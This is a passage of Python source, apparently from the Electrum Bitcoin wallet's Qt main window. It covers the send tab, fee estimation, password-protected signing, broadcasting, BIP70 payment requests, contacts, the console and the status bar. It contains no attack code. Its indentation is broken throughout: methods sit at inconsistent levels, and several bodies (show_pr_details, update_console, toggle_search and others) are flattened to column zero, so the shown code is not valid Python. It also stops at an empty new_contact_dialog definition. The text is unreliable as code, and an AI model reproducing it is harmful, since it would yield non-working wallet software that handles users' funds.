    vbox_feelabel = QVBoxLayout()
    vbox_feelabel.addWidget(self.fee_e_label)
    vbox_feelabel.addStretch(1)
    grid.addLayout(vbox_feelabel, 5, 0)
    # advanced fee controls (feerate / size / absolute fee); hidden unless
    # the 'show_fee' config flag is set
    self.fee_adv_controls = QWidget()
    hbox = QHBoxLayout(self.fee_adv_controls)
    hbox.setContentsMargins(0, 0, 0, 0)
    hbox.addWidget(self.feerate_e)
    hbox.addWidget(self.size_e)
    hbox.addWidget(self.fee_e)
    hbox.addWidget(self.feerounding_icon, Qt.AlignLeft)
    hbox.addStretch(1)
    vbox_feecontrol = QVBoxLayout()
    vbox_feecontrol.addWidget(self.fee_adv_controls)
    vbox_feecontrol.addWidget(self.fee_slider)
    grid.addLayout(vbox_feecontrol, 5, 1, 1, -1)
    if not self.config.get('show_fee', False):
        self.fee_adv_controls.setVisible(False)
    self.preview_button = EnterButton(_("Preview"), self.do_preview)
    self.preview_button.setToolTip(_('Display the details of your transaction before signing it.'))
    self.send_button = EnterButton(_("Send"), self.do_send)
    self.clear_button = EnterButton(_("Clear"), self.do_clear)
    buttons = QHBoxLayout()
    buttons.addStretch(1)
    buttons.addWidget(self.clear_button)
    buttons.addWidget(self.preview_button)
    buttons.addWidget(self.send_button)
    grid.addLayout(buttons, 6, 1, 1, 3)
    self.amount_e.shortcut.connect(self.spend_max)
    self.payto_e.textChanged.connect(self.update_fee)
    self.amount_e.textEdited.connect(self.update_fee)

    def reset_max(text):
        # manual edits to an amount disable 'Max' mode
        self.max_button.setChecked(False)
        enable = not bool(text) and not self.amount_e.isReadOnly()
        self.max_button.setEnabled(enable)
    self.amount_e.textEdited.connect(reset_max)
    self.fiat_send_e.textEdited.connect(reset_max)

    def entry_changed():
        # recolor amount/fee/feerate fields: red = not enough funds,
        # blue = auto-filled value, default = user-entered value
        text = ""
        amt_color = ColorScheme.DEFAULT
        fee_color = ColorScheme.DEFAULT
        feerate_color = ColorScheme.DEFAULT
        if self.not_enough_funds:
            amt_color, fee_color = ColorScheme.RED, ColorScheme.RED
            feerate_color = ColorScheme.RED
            text = _("Not enough funds")
            c, u, x = self.wallet.get_frozen_balance()
            if c+u+x:
                text += " ({} {} {})".format(
                    self.format_amount(c + u + x).strip(), self.base_unit(), _("are frozen")
                )
        # blue color denotes auto-filled values
        elif self.fee_e.isModified():
            feerate_color = ColorScheme.BLUE
        elif self.feerate_e.isModified():
            fee_color = ColorScheme.BLUE
        elif self.amount_e.isModified():
            fee_color = ColorScheme.BLUE
            feerate_color = ColorScheme.BLUE
        else:
            amt_color = ColorScheme.BLUE
            fee_color = ColorScheme.BLUE
            feerate_color = ColorScheme.BLUE
        self.statusBar().showMessage(text)
        self.amount_e.setStyleSheet(amt_color.as_stylesheet())
        self.fee_e.setStyleSheet(fee_color.as_stylesheet())
        self.feerate_e.setStyleSheet(feerate_color.as_stylesheet())

    self.amount_e.textChanged.connect(entry_changed)
    self.fee_e.textChanged.connect(entry_changed)
    self.feerate_e.textChanged.connect(entry_changed)
    self.invoices_label = QLabel(_('Invoices'))
    from .invoice_list import InvoiceList
    self.invoice_list = InvoiceList(self)
    # overall layout: grid on top, invoice list at the bottom
    vbox0 = QVBoxLayout()
    vbox0.addLayout(grid)
    hbox = QHBoxLayout()
    hbox.addLayout(vbox0)
    w = QWidget()
    vbox = QVBoxLayout(w)
    vbox.addLayout(hbox)
    vbox.addStretch(1)
    vbox.addWidget(self.invoices_label)
    vbox.addWidget(self.invoice_list)
    vbox.setStretchFactor(self.invoice_list, 1000)
    w.searchable_list = self.invoice_list
    # allow plugins (e.g. exchange rate) to extend the grid
    run_hook('create_send_tab', grid)
    return w
def spend_max(self):
    """Enter 'Max' mode: spend the full available balance (unless a hook aborts)."""
    if run_hook('abort_send', self):
        return
    self.max_button.setChecked(True)
    self.do_update_fee()
def update_fee(self):
    """Schedule a fee recalculation.

    Only sets a flag; presumably consumed by a periodic/main-loop handler that
    calls do_update_fee — not visible in this chunk, confirm against caller.
    """
    self.require_fee_update = True
def get_payto_or_dummy(self):
    """Return the payto field's recipient, or a dummy wallet-address output."""
    recipient = self.payto_e.get_recipient()
    if not recipient:
        recipient = (TYPE_ADDRESS, self.wallet.dummy_address())
    return recipient
def do_update_fee(self):
    '''Recalculate the fee. If the fee was manually input, retain it, but
    still build the TX to see if there are enough funds.

    Builds a candidate unsigned transaction from the current send-tab state
    to derive size/fee/feerate, updates the fee widgets and the rounding
    icon, and (in Max mode) writes the spendable amount back into amount_e.
    '''
    freeze_fee = self.is_send_fee_frozen()
    freeze_feerate = self.is_send_feerate_frozen()
    amount = '!' if self.max_button.isChecked() else self.amount_e.get_amount()
    if amount is None:
        # nothing to send yet: clear auto-filled fee and any error state
        if not freeze_fee:
            self.fee_e.setAmount(None)
        self.not_enough_funds = False
        self.statusBar().showMessage('')
    else:
        fee_estimator = self.get_send_fee_estimator()
        outputs = self.payto_e.get_outputs(self.max_button.isChecked())
        if not outputs:
            # no parsed outputs yet: use a dummy output so a size estimate works
            _type, addr = self.get_payto_or_dummy()
            outputs = [TxOutput(_type, addr, amount)]
        is_sweep = bool(self.tx_external_keypairs)
        make_tx = lambda fee_est: \
            self.wallet.make_unsigned_transaction(
                self.get_coins(), outputs, self.config,
                fixed_fee=fee_est, is_sweep=is_sweep)
        try:
            tx = make_tx(fee_estimator)
            self.not_enough_funds = False
        except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
            if not freeze_fee:
                self.fee_e.setAmount(None)
            if not freeze_feerate:
                self.feerate_e.setAmount(None)
            self.feerounding_icon.setVisible(False)
            if isinstance(e, NotEnoughFunds):
                self.not_enough_funds = True
            elif isinstance(e, NoDynamicFeeEstimates):
                # no fee estimate available: still try to show the tx size
                try:
                    tx = make_tx(0)
                    size = tx.estimated_size()
                    self.size_e.setAmount(size)
                except BaseException:
                    pass
            return
        except BaseException:
            self.logger.exception('')
            return
        size = tx.estimated_size()
        self.size_e.setAmount(size)
        fee = tx.get_fee()
        fee = None if self.not_enough_funds else fee
        # Displayed fee/fee_rate values are set according to user input.
        # Due to rounding or dropping dust in CoinChooser,
        # actual fees often differ somewhat.
        if freeze_feerate or self.fee_slider.is_active():
            displayed_feerate = self.feerate_e.get_amount()
            if displayed_feerate is not None:
                displayed_feerate = quantize_feerate(displayed_feerate)
            else:
                # fallback to actual fee
                displayed_feerate = quantize_feerate(fee / size) if fee is not None else None
                self.feerate_e.setAmount(displayed_feerate)
            displayed_fee = round(displayed_feerate * size) if displayed_feerate is not None else None
            self.fee_e.setAmount(displayed_fee)
        else:
            if freeze_fee:
                displayed_fee = self.fee_e.get_amount()
            else:
                # fallback to actual fee if nothing is frozen
                displayed_fee = fee
                self.fee_e.setAmount(displayed_fee)
            displayed_fee = displayed_fee if displayed_fee else 0
            displayed_feerate = quantize_feerate(displayed_fee / size) if displayed_fee is not None else None
            self.feerate_e.setAmount(displayed_feerate)
        # show/hide fee rounding icon
        feerounding = (fee - displayed_fee) if fee else 0
        self.set_feerounding_text(int(feerounding))
        self.feerounding_icon.setToolTip(self.feerounding_text)
        self.feerounding_icon.setVisible(abs(feerounding) >= 1)
        if self.max_button.isChecked():
            # in Max mode the amount is derived from the tx, minus any
            # plugin-imposed extra fee
            amount = tx.output_value()
            __, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
            amount_after_all_fees = amount - x_fee_amount
            self.amount_e.setAmount(amount_after_all_fees)
def from_list_delete(self, item):
    """Remove *item* from the 'pay from' coin selection and refresh the fee."""
    i = self.from_list.indexOfTopLevelItem(item)
    self.pay_from.pop(i)
    self.redraw_from_list()
    self.update_fee()
def from_list_menu(self, position):
    """Show the context menu (Remove) for the 'From' coin list."""
    selected_item = self.from_list.itemAt(position)
    menu = QMenu()
    menu.addAction(_("Remove"), lambda: self.from_list_delete(selected_item))
    global_pos = self.from_list.viewport().mapToGlobal(position)
    menu.exec_(global_pos)
def set_pay_from(self, coins):
    """Replace the explicit coin selection with *coins* and redraw the list."""
    self.pay_from = list(coins)
    self.redraw_from_list()
def redraw_from_list(self):
    """Rebuild the 'From' list widget from self.pay_from; hidden when empty."""
    self.from_list.clear()
    is_empty = len(self.pay_from) == 0
    self.from_label.setHidden(is_empty)
    self.from_list.setHidden(is_empty)

    def describe(coin):
        # shortened "txid...txid:vout<TAB>address"
        txid = coin.get('prevout_hash')
        return txid[0:10] + '...' + txid[-10:] + ":%d" % coin.get('prevout_n') \
            + u'\t' + "%s" % coin.get('address')

    for coin in self.pay_from:
        row = QTreeWidgetItem([describe(coin), self.format_amount(coin['value'])])
        self.from_list.addTopLevelItem(row)
def get_contact_payto(self, key):
    """Return 'label <key>' for address contacts, otherwise the key itself."""
    contact_type, label = self.contacts.get(key)
    if contact_type == 'address':
        return label + ' <' + key + '>'
    return key
def update_completions(self):
    """Refresh the payto auto-completion model from the contact book."""
    entries = list(map(self.get_contact_payto, self.contacts.keys()))
    self.completions.setStringList(entries)
def protected(func):
    '''Password request wrapper. The password is passed to the function
    as the 'password' named argument. "None" indicates either an
    unencrypted wallet, or the user cancelled the password request.
    An empty input is passed as the empty string.'''
    def request_password(self, *args, **kwargs):
        parent = self.top_level_window()
        password = None
        # keep prompting until a password validates or the user cancels
        while self.wallet.has_keystore_encryption():
            password = self.password_dialog(parent=parent)
            if password is None:
                # User cancelled password input
                return
            try:
                self.wallet.check_password(password)
                break
            except Exception as e:
                # wrong password: show the error and prompt again
                self.show_error(str(e), parent=parent)
                continue
        kwargs['password'] = password
        return func(self, *args, **kwargs)
    return request_password
def is_send_fee_frozen(self):
    """Truthy when the user manually pinned an absolute fee in the fee field."""
    fee_widget = self.fee_e
    if not (fee_widget.isVisible() and fee_widget.isModified()):
        return False
    return fee_widget.text() or fee_widget.hasFocus()
def is_send_feerate_frozen(self):
    """Truthy when the user manually pinned a feerate in the feerate field."""
    feerate_widget = self.feerate_e
    if not (feerate_widget.isVisible() and feerate_widget.isModified()):
        return False
    return feerate_widget.text() or feerate_widget.hasFocus()
def get_send_fee_estimator(self):
    """Return the fee estimator for make_unsigned_transaction.

    An absolute amount when the fee field is frozen, a callable for a frozen
    feerate, or None to let the config choose.
    """
    if self.is_send_fee_frozen():
        return self.fee_e.get_amount()
    if self.is_send_feerate_frozen():
        feerate = self.feerate_e.get_amount()  # sat/byte feerate
        feerate = 0 if feerate is None else feerate * 1000  # sat/kilobyte feerate
        return partial(simple_config.SimpleConfig.estimate_fee_for_feerate, feerate)
    return None
def read_send_tab(self):
    """Collect and validate the send-tab state.

    Returns a (outputs, fee_estimator, label, coins) tuple, or None when the
    form is invalid (expired request, parse errors, missing/invalid outputs)
    or the user aborts a warning dialog.
    """
    if self.payment_request and self.payment_request.has_expired():
        self.show_error(_('Payment request has expired'))
        return
    label = self.message_e.text()
    if self.payment_request:
        # BIP70 request dictates the outputs
        outputs = self.payment_request.get_outputs()
    else:
        errors = self.payto_e.get_errors()
        if errors:
            self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors]))
            return
        outputs = self.payto_e.get_outputs(self.max_button.isChecked())
        # warn when an alias address could not be confirmed via DNSSEC
        if self.payto_e.is_alias and self.payto_e.validated is False:
            alias = self.payto_e.toPlainText()
            msg = _('WARNING: the alias "{}" could not be validated via an additional '
                    'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
            msg += _('Do you wish to continue?')
            if not self.question(msg):
                return
    if not outputs:
        self.show_error(_('No outputs'))
        return
    for o in outputs:
        if o.address is None:
            self.show_error(_('Bitcoin Address is None'))
            return
        if o.type == TYPE_ADDRESS and not bitcoin.is_address(o.address):
            self.show_error(_('Invalid Bitcoin Address'))
            return
        if o.value is None:
            self.show_error(_('Invalid Amount'))
            return
    fee_estimator = self.get_send_fee_estimator()
    coins = self.get_coins()
    return outputs, fee_estimator, label, coins
def do_preview(self):
    """Build the transaction and show it in a dialog instead of broadcasting."""
    self.do_send(preview=True)
def do_send(self, preview = False):
    """Build, confirm, sign and broadcast the transaction from the send tab.

    With preview=True the unsigned transaction is only shown in a dialog.
    Aborts silently when a plugin hook vetoes, the form is invalid, or the
    user declines a confirmation/password dialog.
    """
    if run_hook('abort_send', self):
        return
    r = self.read_send_tab()
    if not r:
        return
    outputs, fee_estimator, tx_desc, coins = r
    try:
        is_sweep = bool(self.tx_external_keypairs)
        tx = self.wallet.make_unsigned_transaction(
            coins, outputs, self.config, fixed_fee=fee_estimator,
            is_sweep=is_sweep)
    except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
        self.show_message(str(e))
        return
    except InternalAddressCorruption as e:
        # show the error but re-raise: this indicates wallet corruption
        self.show_error(str(e))
        raise
    except BaseException as e:
        self.logger.exception('')
        self.show_message(str(e))
        return
    amount = tx.output_value() if self.max_button.isChecked() else sum(map(lambda x:x[2], outputs))
    fee = tx.get_fee()
    use_rbf = self.config.get('use_rbf', True)
    if use_rbf:
        tx.set_rbf(True)
    # refuse to build a tx the connected server would not relay
    if fee < self.wallet.relayfee() * tx.estimated_size() / 1000:
        self.show_error('\n'.join([
            _("This transaction requires a higher fee, or it will not be propagated by your current server"),
            _("Try to raise your transaction fee, or use a server with a lower relay fee.")
        ]))
        return
    if preview:
        self.show_transaction(tx, tx_desc)
        return
    if not self.network:
        self.show_error(_("You can't broadcast a transaction without a live network connection."))
        return
    # confirmation dialog
    msg = [
        _("Amount to be sent") + ": " + self.format_amount_and_units(amount),
        _("Mining fee") + ": " + self.format_amount_and_units(fee),
    ]
    x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
    if x_fee:
        x_fee_address, x_fee_amount = x_fee
        msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) )
    confirm_rate = simple_config.FEERATE_WARNING_HIGH_FEE
    if fee > confirm_rate * tx.estimated_size() / 1000:
        msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
    if self.wallet.has_keystore_encryption():
        # the password prompt doubles as the confirmation dialog
        msg.append("")
        msg.append(_("Enter your password to proceed"))
        password = self.password_dialog('\n'.join(msg))
        if not password:
            return
    else:
        msg.append(_('Proceed?'))
        password = None
        if not self.question('\n'.join(msg)):
            return

    def sign_done(success):
        if success:
            if not tx.is_complete():
                # partially signed (e.g. multisig): show instead of broadcasting
                self.show_transaction(tx)
                self.do_clear()
            else:
                self.broadcast_transaction(tx, tx_desc)
    self.sign_tx_with_password(tx, sign_done, password)
@protected
def sign_tx(self, tx, callback, password):
    """Sign *tx*; @protected supplies the wallet password (or None)."""
    self.sign_tx_with_password(tx, callback, password)
def sign_tx_with_password(self, tx, callback, password):
    '''Sign the transaction in a separate thread. When done, calls
    the callback with a success code of True or False.
    '''
    def on_success(result):
        callback(True)
    def on_failure(exc_info):
        self.on_error(exc_info)
        callback(False)
    # plugins (e.g. TrustedCoin) may wrap the success handler
    on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
    if self.tx_external_keypairs:
        # can sign directly
        task = partial(Transaction.sign, tx, self.tx_external_keypairs)
    else:
        task = partial(self.wallet.sign_transaction, tx, password)
    msg = _('Signing transaction...')
    WaitingDialog(self, msg, task, on_success, on_failure)
def broadcast_transaction(self, tx, tx_desc):
    """Broadcast *tx* off the GUI thread and report the result in a dialog.

    Also marks an active BIP70 payment request as paid and sends its
    payment-ACK message when broadcasting succeeds.
    """
    def broadcast_thread():
        # non-GUI thread
        pr = self.payment_request
        if pr and pr.has_expired():
            self.payment_request = None
            return False, _("Payment request has expired")
        status = False
        try:
            self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
        except TxBroadcastError as e:
            msg = e.get_message_for_gui()
        except BestEffortRequestFailed as e:
            msg = repr(e)
        else:
            status, msg = True, tx.txid()
        if pr and status is True:
            self.invoices.set_paid(pr, tx.txid())
            self.invoices.save()
            self.payment_request = None
            refund_address = self.wallet.get_receiving_address()
            coro = pr.send_payment_and_receive_paymentack(str(tx), refund_address)
            fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
            ack_status, ack_msg = fut.result(timeout=20)
            self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}")
        return status, msg

    # Capture current TL window; override might be removed on return
    parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))

    def broadcast_done(result):
        # GUI thread
        if result:
            status, msg = result
            if status:
                if tx_desc is not None and tx.is_complete():
                    self.wallet.set_label(tx.txid(), tx_desc)
                parent.show_message(_('Payment sent.') + '\n' + msg)
                self.invoice_list.update()
                self.do_clear()
            else:
                msg = msg or ''
                parent.show_error(msg)

    WaitingDialog(self, _('Broadcasting transaction...'),
                  broadcast_thread, broadcast_done, self.on_error)
def query_choice(self, msg, choices):
    """Modal chooser over *choices*; returns the selected index or None on cancel."""
    # Needed by QtHandler for hardware wallets
    dlg = WindowModalDialog(self.top_level_window())
    chooser = ChoicesLayout(msg, choices)
    box = QVBoxLayout(dlg)
    box.addLayout(chooser.layout())
    box.addLayout(Buttons(OkButton(dlg)))
    if dlg.exec_():
        return chooser.selected_index()
    return None
def lock_amount(self, b):
    """Freeze/unfreeze the amount field; 'Max' is only enabled while unfrozen."""
    self.amount_e.setFrozen(b)
    self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
    """Lock the send tab while a payment request is being fetched."""
    self.show_send_tab()
    self.payto_e.is_pr = True
    for e in [self.payto_e, self.message_e]:
        e.setFrozen(True)
    self.lock_amount(True)
    self.payto_e.setText(_("please wait..."))
    return True
def delete_invoice(self, key):
    """Remove invoice *key* from storage and refresh the invoice list."""
    self.invoices.remove(key)
    self.invoice_list.update()
def payment_request_ok(self):
    """Populate the send tab from a successfully verified payment request."""
    pr = self.payment_request
    key = self.invoices.add(pr)
    status = self.invoices.get_status(key)
    self.invoice_list.update()
    if status == PR_PAID:
        self.show_message("invoice already paid")
        self.do_clear()
        self.payment_request = None
        return
    self.payto_e.is_pr = True
    # color the payto field green (valid) or mark it expired
    if not pr.has_expired():
        self.payto_e.setGreen()
    else:
        self.payto_e.setExpired()
    self.payto_e.setText(pr.get_requestor())
    self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
    self.message_e.setText(pr.get_memo())
    # signal to set fee
    self.amount_e.textEdited.emit("")
def payment_request_error(self):
    """Show the failed payment request's error and reset the send tab."""
    self.show_message(self.payment_request.error)
    self.payment_request = None
    self.do_clear()
def on_pr(self, request):
    """Store an incoming payment request, verify it, and notify via Qt signals."""
    self.payment_request = request
    if self.payment_request.verify(self.contacts):
        outcome_signal = self.payment_request_ok_signal
    else:
        outcome_signal = self.payment_request_error_signal
    outcome_signal.emit()
def pay_to_URI(self, URI):
    """Fill the send tab from a BIP21 bitcoin: URI.

    URIs carrying a request ('r') or a signed request ('name'+'sig') switch
    into payment-request mode and are resolved asynchronously via on_pr;
    plain URIs fill address/message/amount directly.
    """
    if not URI:
        return
    try:
        out = util.parse_URI(URI, self.on_pr)
    except BaseException as e:
        self.show_error(_('Invalid bitcoin URI:') + '\n' + str(e))
        return
    self.show_send_tab()
    r = out.get('r')
    sig = out.get('sig')
    name = out.get('name')
    if r or (name and sig):
        # a payment request will arrive via the on_pr callback
        self.prepare_for_payment_request()
        return
    address = out.get('address')
    amount = out.get('amount')
    label = out.get('label')
    message = out.get('message')
    # use label as description (not BIP21 compliant)
    if label and not message:
        message = label
    if address:
        self.payto_e.setText(address)
    if message:
        self.message_e.setText(message)
    if amount:
        self.amount_e.setAmount(amount)
        self.amount_e.textEdited.emit("")
def do_clear(self):
    """Reset the send tab (fields, fee controls, coin selection) to defaults."""
    self.max_button.setChecked(False)
    self.not_enough_funds = False
    self.payment_request = None
    self.payto_e.is_pr = False
    for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e,
              self.fee_e, self.feerate_e]:
        e.setText('')
        e.setFrozen(False)
    # fee controls back to slider-driven defaults
    self.fee_slider.activate()
    self.feerate_e.setAmount(self.config.fee_per_byte())
    self.size_e.setAmount(0)
    self.feerounding_icon.setVisible(False)
    self.set_pay_from([])
    self.tx_external_keypairs = {}
    self.update_status()
    run_hook('do_clear', self)
def set_frozen_state_of_addresses(self, addrs, freeze: bool):
    """(Un)freeze *addrs* in the wallet and refresh the dependent views."""
    self.wallet.set_frozen_state_of_addresses(addrs, freeze)
    self.address_list.update()
    self.utxo_list.update()
    self.update_fee()
def set_frozen_state_of_coins(self, utxos, freeze: bool):
    """(Un)freeze individual *utxos* in the wallet and refresh the dependent views."""
    self.wallet.set_frozen_state_of_coins(utxos, freeze)
    self.utxo_list.update()
    self.update_fee()
def create_list_tab(self, l, toolbar=None):
    """Wrap list widget *l* (with an optional *toolbar*) into a tab widget."""
    tab = QWidget()
    tab.searchable_list = l
    layout = QVBoxLayout()
    tab.setLayout(layout)
    layout.setContentsMargins(0, 0, 0, 0)
    layout.setSpacing(0)
    if toolbar:
        layout.addLayout(toolbar)
    layout.addWidget(l)
    return tab
def create_addresses_tab(self):
    """Build the Addresses tab, restoring its toolbar visibility from config."""
    from .address_list import AddressList
    self.address_list = address_list = AddressList(self)
    toolbar = address_list.create_toolbar(self.config)
    address_list.show_toolbar(self.config.get('show_toolbar_addresses', False))
    return self.create_list_tab(address_list, toolbar)
def create_utxo_tab(self):
    """Build the Coins (UTXO) tab."""
    from .utxo_list import UTXOList
    self.utxo_list = utxo_list = UTXOList(self)
    return self.create_list_tab(utxo_list)
def create_contacts_tab(self):
    """Build the Contacts tab."""
    from .contact_list import ContactList
    self.contact_list = contact_list = ContactList(self)
    return self.create_list_tab(contact_list)
def remove_address(self, addr):
    """Delete *addr* from the wallet after user confirmation and refresh the UI."""
    if self.question(_("Do you want to remove {} from your wallet?").format(addr)):
        self.wallet.delete_address(addr)
        self.need_update.set()  # history, addresses, coins
        self.clear_receive_tab()
def get_coins(self):
    """Coins to spend: the explicit 'pay from' selection, else all spendable coins."""
    if self.pay_from:
        return self.pay_from
    return self.wallet.get_spendable_coins(None, self.config)
def spend_coins(self, coins):
    """Open the send tab with *coins* preselected as the inputs to spend."""
    self.set_pay_from(coins)
    self.show_send_tab()
    self.update_fee()
def paytomany(self):
    """Switch the payto field into multi-recipient mode and explain the format."""
    self.show_send_tab()
    self.payto_e.paytomany()
    msg = '\n'.join([
        _('Enter a list of outputs in the \'Pay to\' field.'),
        _('One output per line.'),
        _('Format: address, amount'),
        _('You may load a CSV file using the file icon.')
    ])
    self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
    """Fill the send tab's payto field from one or more contact labels."""
    paytos = [self.get_contact_payto(label) for label in labels]
    self.show_send_tab()
    if len(paytos) == 1:
        self.payto_e.setText(paytos[0])
        self.amount_e.setFocus()
        return
    # several recipients: one "payto, 0" line each (paytomany format)
    lines = [payto + ", 0" for payto in paytos]
    self.payto_e.setText("\n".join(lines))
    self.payto_e.setFocus()
def set_contact(self, label, address):
    """Store *label* for *address* in the contact book; returns True on success."""
    if not is_address(address):
        self.show_error(_('Invalid Address'))
        self.contact_list.update()  # Displays original unchanged value
        return False
    self.contacts[address] = ('address', label)
    self.contact_list.update()
    self.history_list.update()
    self.update_completions()
    return True
def delete_contacts(self, labels):
    """Remove the given contact keys after a single confirmation dialog."""
    if not self.question(_("Remove {} from your list of contacts?")
                         .format(" + ".join(labels))):
        return
    for label in labels:
        self.contacts.pop(label)
    self.history_list.update()
    self.contact_list.update()
    self.update_completions()
def show_invoice(self, key):
    """Look up invoice *key*, refresh its verification status, and show details."""
    pr = self.invoices.get(key)
    if pr is None:
        self.show_error('Cannot find payment request in wallet.')
        return
    pr.verify(self.contacts)
    self.show_pr_details(pr)
def show_pr_details(self, pr):
key = pr.get_id()
d = WindowModalDialog(self, _("Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2])+ self.base_unit() + ' @ ' + x[1], pr.get_outputs()))
grid.addWidget(QLabel(outputs_str), 1, 1)
expires = pr.get_expiration_date()
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
if expires:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(expires)), 4, 1)
vbox.addLayout(grid)
def do_export():
name = str(key) + '.bip70'
fn = self.getSaveFileName(_("Save invoice to file"), name, filter="*.bip70")
if not fn:
return
with open(fn, 'wb') as f:
data = f.write(pr.raw)
self.show_message(_('Invoice saved as' + ' ' + fn))
exportButton = EnterButton(_('Save'), do_export)
def do_delete():
if self.question(_('Delete invoice?')):
self.invoices.remove(key)
self.history_list.update()
self.invoice_list.update()
d.close()
deleteButton = EnterButton(_('Delete'), do_delete)
vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d)))
d.exec_()
    def do_pay_invoice(self, key):
        """Load the invoice stored under *key* into the Send tab and start payment."""
        pr = self.invoices.get(key)
        self.payment_request = pr
        self.prepare_for_payment_request()
        pr.error = None  # this forces verify() to re-run
        if pr.verify(self.contacts):
            self.payment_request_ok()
        else:
            self.payment_request_error()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.config.get("console-history",[])
console.history_index = len(console.history)
console.updateNamespace({
'wallet': self.wallet,
'network': self.network,
'plugins': self.gui_object.plugins,
'window': self,
'config': self.config,
'electrum': electrum,
'daemon': self.gui_object.daemon,
'util': util,
'bitcoin': bitcoin,
})
c = commands.Commands(self.config, self.wallet, self.network, lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
return lambda *args: f(method, args, self.password_dialog)
for m in dir(c):
if m[0]=='_' or m in ['network','wallet','config']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
    def create_status_bar(self):
        """Assemble the main window's status bar: balance label, hidden search
        box, update-check button, and the password/preferences/seed/network
        buttons (widget insertion order determines on-screen order)."""
        sb = QStatusBar()
        sb.setFixedHeight(35)
        # left side: wallet balance summary
        self.balance_label = QLabel("Loading wallet...")
        self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
        self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
        sb.addWidget(self.balance_label)
        # search field, hidden until toggled via toggle_search()
        self.search_box = QLineEdit()
        self.search_box.textChanged.connect(self.do_search)
        self.search_box.hide()
        sb.addPermanentWidget(self.search_box)
        # flat button shown when a software update is available
        self.update_check_button = QPushButton("")
        self.update_check_button.setFlat(True)
        self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor))
        self.update_check_button.setIcon(read_QIcon("update.png"))
        self.update_check_button.hide()
        sb.addPermanentWidget(self.update_check_button)
        self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog )
        sb.addPermanentWidget(self.password_button)
        sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog ) )
        self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog )
        sb.addPermanentWidget(self.seed_button)
        self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"), lambda: self.gui_object.show_network_dialog(self))
        sb.addPermanentWidget(self.status_button)
        # let plugins add their own status bar widgets
        run_hook('create_status_bar', sb)
        self.setStatusBar(sb)
def update_lock_icon(self):
icon = read_QIcon("lock.png") if self.wallet.has_password() else read_QIcon("unlock.png")
self.password_button.setIcon(icon)
    def update_buttons_on_seed(self):
        """Show or hide seed/password/send controls to match wallet capabilities."""
        self.seed_button.setVisible(self.wallet.has_seed())
        self.password_button.setVisible(self.wallet.may_have_password())
        # watching-only wallets cannot sign, so hide the Send button
        self.send_button.setVisible(not self.wallet.is_watching_only())
    def change_password_dialog(self):
        """Let the user change (or disable) the wallet password.

        Wallets whose storage encryption is keyed from an xpub (hardware
        wallets) get a dedicated dialog, since the storage "password" comes
        from the device rather than from the user.
        """
        from electrum.storage import STO_EV_XPUB_PW
        if self.wallet.get_available_storage_encryption_version() == STO_EV_XPUB_PW:
            # hardware wallet: derive the storage password from the device
            from .password_dialog import ChangePasswordDialogForHW
            d = ChangePasswordDialogForHW(self, self.wallet)
            ok, encrypt_file = d.run()
            if not ok:
                return
            try:
                hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
            except UserCancelled:
                return
            except BaseException as e:
                self.logger.exception('')
                self.show_error(str(e))
                return
            old_password = hw_dev_pw if self.wallet.has_password() else None
            new_password = hw_dev_pw if encrypt_file else None
        else:
            # software wallet: ask the user for old and new passwords
            from .password_dialog import ChangePasswordDialogForSW
            d = ChangePasswordDialogForSW(self, self.wallet)
            ok, old_password, new_password, encrypt_file = d.run()
            if not ok:
                return
        try:
            self.wallet.update_password(old_password, new_password, encrypt_file)
        except InvalidPassword as e:
            self.show_error(str(e))
            return
        except BaseException:
            self.logger.exception('Failed to update password')
            self.show_error(_('Failed to update password'))
            return
        msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
        self.show_message(msg, title=_("Success"))
        self.update_lock_icon()
def toggle_search(self):
tab = self.tabs.currentWidget()
#if hasattr(tab, 'searchable_list'):
# tab.searchable_list.toggle_toolbar()
#return
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
